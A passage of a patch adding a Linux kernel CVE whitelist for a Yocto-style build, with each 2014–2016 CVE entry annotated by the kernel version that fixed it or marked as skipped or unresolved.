+CVE_CHECK_WHITELIST += "CVE-2014-8171"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8172"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2014-8173"
+
+# Skipping CVE-2014-8181, no affected_versions
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8369"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8480"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-8481"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8559"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8709"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8884"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8989"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9090"
+
+# fixed-version: Fixed after version 3.18rc6
+CVE_CHECK_WHITELIST += "CVE-2014-9322"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9419"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9420"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9428"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9529"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9584"
+
+# fixed-version: Fixed after version 3.19rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9585"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9644"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9683"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9710"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9715"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9717"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9728"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9729"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9730"
+
+# fixed-version: Fixed after version 3.19rc3
+CVE_CHECK_WHITELIST += "CVE-2014-9731"
+
+# Skipping CVE-2014-9777, no affected_versions
+
+# Skipping CVE-2014-9778, no affected_versions
+
+# Skipping CVE-2014-9779, no affected_versions
+
+# Skipping CVE-2014-9780, no affected_versions
+
+# Skipping CVE-2014-9781, no affected_versions
+
+# Skipping CVE-2014-9782, no affected_versions
+
+# Skipping CVE-2014-9783, no affected_versions
+
+# Skipping CVE-2014-9784, no affected_versions
+
+# Skipping CVE-2014-9785, no affected_versions
+
+# Skipping CVE-2014-9786, no affected_versions
+
+# Skipping CVE-2014-9787, no affected_versions
+
+# Skipping CVE-2014-9788, no affected_versions
+
+# Skipping CVE-2014-9789, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9803"
+
+# Skipping CVE-2014-9863, no affected_versions
+
+# Skipping CVE-2014-9864, no affected_versions
+
+# Skipping CVE-2014-9865, no affected_versions
+
+# Skipping CVE-2014-9866, no affected_versions
+
+# Skipping CVE-2014-9867, no affected_versions
+
+# Skipping CVE-2014-9868, no affected_versions
+
+# Skipping CVE-2014-9869, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9870"
+
+# Skipping CVE-2014-9871, no affected_versions
+
+# Skipping CVE-2014-9872, no affected_versions
+
+# Skipping CVE-2014-9873, no affected_versions
+
+# Skipping CVE-2014-9874, no affected_versions
+
+# Skipping CVE-2014-9875, no affected_versions
+
+# Skipping CVE-2014-9876, no affected_versions
+
+# Skipping CVE-2014-9877, no affected_versions
+
+# Skipping CVE-2014-9878, no affected_versions
+
+# Skipping CVE-2014-9879, no affected_versions
+
+# Skipping CVE-2014-9880, no affected_versions
+
+# Skipping CVE-2014-9881, no affected_versions
+
+# Skipping CVE-2014-9882, no affected_versions
+
+# Skipping CVE-2014-9883, no affected_versions
+
+# Skipping CVE-2014-9884, no affected_versions
+
+# Skipping CVE-2014-9885, no affected_versions
+
+# Skipping CVE-2014-9886, no affected_versions
+
+# Skipping CVE-2014-9887, no affected_versions
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9888"
+
+# Skipping CVE-2014-9889, no affected_versions
+
+# Skipping CVE-2014-9890, no affected_versions
+
+# Skipping CVE-2014-9891, no affected_versions
+
+# Skipping CVE-2014-9892, no affected_versions
+
+# Skipping CVE-2014-9893, no affected_versions
+
+# Skipping CVE-2014-9894, no affected_versions
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9895"
+
+# Skipping CVE-2014-9896, no affected_versions
+
+# Skipping CVE-2014-9897, no affected_versions
+
+# Skipping CVE-2014-9898, no affected_versions
+
+# Skipping CVE-2014-9899, no affected_versions
+
+# Skipping CVE-2014-9900, no affected_versions
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-9903"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9904"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9914"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-9922"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-9940"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2015-0239"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2015-0274"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-0275"
+
+# Skipping CVE-2015-0777, no affected_versions
+
+# Skipping CVE-2015-1328, no affected_versions
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1333"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1339"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1350"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1420"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1421"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-1465"
+
+# fixed-version: Fixed after version 3.19rc5
+CVE_CHECK_WHITELIST += "CVE-2015-1573"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1593"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2015-1805"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2041"
+
+# fixed-version: Fixed after version 3.19
+CVE_CHECK_WHITELIST += "CVE-2015-2042"
+
+# fixed-version: Fixed after version 4.0rc4
+CVE_CHECK_WHITELIST += "CVE-2015-2150"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2666"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2672"
+
+# fixed-version: Fixed after version 4.0rc6
+CVE_CHECK_WHITELIST += "CVE-2015-2686"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-2830"
+
+# CVE-2015-2877 has no known resolution
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2015-2922"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-2925"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3212"
+
+# fixed-version: Fixed after version 2.6.33rc8
+CVE_CHECK_WHITELIST += "CVE-2015-3214"
+
+# fixed-version: Fixed after version 4.2rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3288"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3290"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-3291"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2015-3331"
+
+# Skipping CVE-2015-3332, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-3339"
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-3636"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4001"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4002"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-4003"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4004"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4036"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4167"
+
+# fixed-version: Fixed after version 3.13rc5
+CVE_CHECK_WHITELIST += "CVE-2015-4170"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4176"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4177"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4178"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-4692"
+
+# fixed-version: Fixed after version 4.1rc6
+CVE_CHECK_WHITELIST += "CVE-2015-4700"
+
+# fixed-version: Fixed after version 4.2rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5156"
+
+# fixed-version: Fixed after version 4.2rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5157"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5257"
+
+# fixed-version: Fixed after version 4.3rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5283"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5307"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5327"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5364"
+
+# fixed-version: Fixed after version 4.1rc7
+CVE_CHECK_WHITELIST += "CVE-2015-5366"
+
+# fixed-version: Fixed after version 4.2rc6
+CVE_CHECK_WHITELIST += "CVE-2015-5697"
+
+# fixed-version: Fixed after version 4.1rc3
+CVE_CHECK_WHITELIST += "CVE-2015-5706"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-5707"
+
+# fixed-version: Fixed after version 4.2rc5
+CVE_CHECK_WHITELIST += "CVE-2015-6252"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6526"
+
+# CVE-2015-6619 has no known resolution
+
+# CVE-2015-6646 has no known resolution
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-6937"
+
+# Skipping CVE-2015-7312, no affected_versions
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7509"
+
+# fixed-version: Fixed after version 4.4rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7513"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7515"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-7550"
+
+# Skipping CVE-2015-7553, no affected_versions
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2015-7566"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7613"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7799"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2015-7833"
+
+# Skipping CVE-2015-7837, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2015-7872"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7884"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-7885"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-7990"
+
+# Skipping CVE-2015-8019, no affected_versions
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8104"
+
+# fixed-version: Fixed after version 4.0rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8215"
+
+# fixed-version: Fixed after version 2.6.34rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8324"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8374"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8539"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8543"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8550"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8551"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8552"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8553"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8569"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8575"
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8660"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8709"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8746"
+
+# fixed-version: Fixed after version 4.3rc4
+CVE_CHECK_WHITELIST += "CVE-2015-8767"
+
+# fixed-version: Fixed after version 4.4rc5
+CVE_CHECK_WHITELIST += "CVE-2015-8785"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8787"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8812"
+
+# fixed-version: Fixed after version 4.4rc6
+CVE_CHECK_WHITELIST += "CVE-2015-8816"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8830"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8839"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8844"
+
+# fixed-version: Fixed after version 4.4rc3
+CVE_CHECK_WHITELIST += "CVE-2015-8845"
+
+# Skipping CVE-2015-8937, no affected_versions
+
+# Skipping CVE-2015-8938, no affected_versions
+
+# Skipping CVE-2015-8939, no affected_versions
+
+# Skipping CVE-2015-8940, no affected_versions
+
+# Skipping CVE-2015-8941, no affected_versions
+
+# Skipping CVE-2015-8942, no affected_versions
+
+# Skipping CVE-2015-8943, no affected_versions
+
+# Skipping CVE-2015-8944, no affected_versions
+
+# fixed-version: Fixed after version 4.1rc2
+CVE_CHECK_WHITELIST += "CVE-2015-8950"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8952"
+
+# fixed-version: Fixed after version 4.3
+CVE_CHECK_WHITELIST += "CVE-2015-8953"
+
+# fixed-version: Fixed after version 4.1rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8955"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8956"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8961"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8962"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2015-8963"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8964"
+
+# fixed-version: Fixed after version 4.4rc8
+CVE_CHECK_WHITELIST += "CVE-2015-8966"
+
+# fixed-version: Fixed after version 4.0rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8967"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2015-8970"
+
+# fixed-version: Fixed after version 3.19rc7
+CVE_CHECK_WHITELIST += "CVE-2015-9004"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9016"
+
+# fixed-version: Fixed after version 4.2rc1
+CVE_CHECK_WHITELIST += "CVE-2015-9289"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0617"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-0723"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0728"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-0758"
+
+# Skipping CVE-2016-0774, no affected_versions
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-0821"
+
+# fixed-version: Fixed after version 4.0rc5
+CVE_CHECK_WHITELIST += "CVE-2016-0823"
+
+# fixed-version: Fixed after version 4.8rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10044"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10088"
+
+# fixed-version: Fixed after version 4.9
+CVE_CHECK_WHITELIST += "CVE-2016-10147"
+
+# fixed-version: Fixed after version 4.9rc8
+CVE_CHECK_WHITELIST += "CVE-2016-10150"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10153"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10154"
+
+# fixed-version: Fixed after version 4.9rc7
+CVE_CHECK_WHITELIST += "CVE-2016-10200"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10208"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10229"
+
+# fixed-version: Fixed after version 4.8rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10318"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10723"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10741"
+
+# fixed-version: Fixed after version 4.10rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10764"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10905"
+
+# fixed-version: Fixed after version 4.5rc6
+CVE_CHECK_WHITELIST += "CVE-2016-10906"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-10907"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-1237"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1575"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-1576"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-1583"
+
+# fixed-version: Fixed after version 4.3rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2053"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2069"
+
+# fixed-version: Fixed after version 4.4
+CVE_CHECK_WHITELIST += "CVE-2016-2070"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2085"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2117"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-2143"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2184"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2185"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2186"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-2187"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2188"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2383"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2384"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2543"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2544"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2545"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2546"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2547"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2548"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2549"
+
+# fixed-version: Fixed after version 4.5rc4
+CVE_CHECK_WHITELIST += "CVE-2016-2550"
+
+# fixed-version: Fixed after version 4.5rc2
+CVE_CHECK_WHITELIST += "CVE-2016-2782"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2016-2847"
+
+# Skipping CVE-2016-2853, no affected_versions
+
+# Skipping CVE-2016-2854, no affected_versions
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3044"
+
+# fixed-version: Fixed after version 4.4rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3070"
+
+# fixed-version: Fixed after version 4.6rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3134"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3135"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3136"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3137"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3138"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3139"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3140"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3156"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3157"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3672"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3689"
+
+# Skipping CVE-2016-3695, no affected_versions
+
+# Skipping CVE-2016-3699, no affected_versions
+
+# Skipping CVE-2016-3707, no affected_versions
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-3713"
+
+# CVE-2016-3775 has no known resolution
+
+# CVE-2016-3802 has no known resolution
+
+# CVE-2016-3803 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2016-3841"
+
+# fixed-version: Fixed after version 4.8rc2
+CVE_CHECK_WHITELIST += "CVE-2016-3857"
+
+# fixed-version: Fixed after version 4.5
+CVE_CHECK_WHITELIST += "CVE-2016-3951"
+
+# fixed-version: Fixed after version 4.6rc3
+CVE_CHECK_WHITELIST += "CVE-2016-3955"
+
+# fixed-version: Fixed after version 4.6rc5
+CVE_CHECK_WHITELIST += "CVE-2016-3961"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4440"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4470"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4482"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4485"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4486"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4557"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4558"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4565"
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-4568"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4569"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4578"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4580"
+
+# fixed-version: Fixed after version 4.6rc7
+CVE_CHECK_WHITELIST += "CVE-2016-4581"
+
+# fixed-version: Fixed after version 4.7rc4
+CVE_CHECK_WHITELIST += "CVE-2016-4794"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4805"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-4913"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4951"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4997"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-4998"
+
+# fixed-version: Fixed after version 4.9rc2
+CVE_CHECK_WHITELIST += "CVE-2016-5195"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5243"
+
+# fixed-version: Fixed after version 4.7rc3
+CVE_CHECK_WHITELIST += "CVE-2016-5244"
+
+# Skipping CVE-2016-5340, no affected_versions
+
+# Skipping CVE-2016-5342, no affected_versions
+
+# Skipping CVE-2016-5343, no affected_versions
+
+# Skipping CVE-2016-5344, no affected_versions
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5400"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5412"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-5696"
+
+# fixed-version: Fixed after version 4.7rc1
+CVE_CHECK_WHITELIST += "CVE-2016-5728"
+
+# fixed-version: Fixed after version 4.7rc6
+CVE_CHECK_WHITELIST += "CVE-2016-5828"
+
+# fixed-version: Fixed after version 4.7rc5
+CVE_CHECK_WHITELIST += "CVE-2016-5829"
+
+# CVE-2016-5870 has no known resolution
+
+# fixed-version: Fixed after version 4.6rc6
+CVE_CHECK_WHITELIST += "CVE-2016-6130"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6136"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6156"
+
+# fixed-version: Fixed after version 4.7
+CVE_CHECK_WHITELIST += "CVE-2016-6162"
+
+# fixed-version: Fixed after version 4.7rc7
+CVE_CHECK_WHITELIST += "CVE-2016-6187"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6197"
+
+# fixed-version: Fixed after version 4.6
+CVE_CHECK_WHITELIST += "CVE-2016-6198"
+
+# fixed-version: Fixed after version 4.9rc1
+CVE_CHECK_WHITELIST += "CVE-2016-6213"
+
+# fixed-version: Fixed after version 4.6rc1
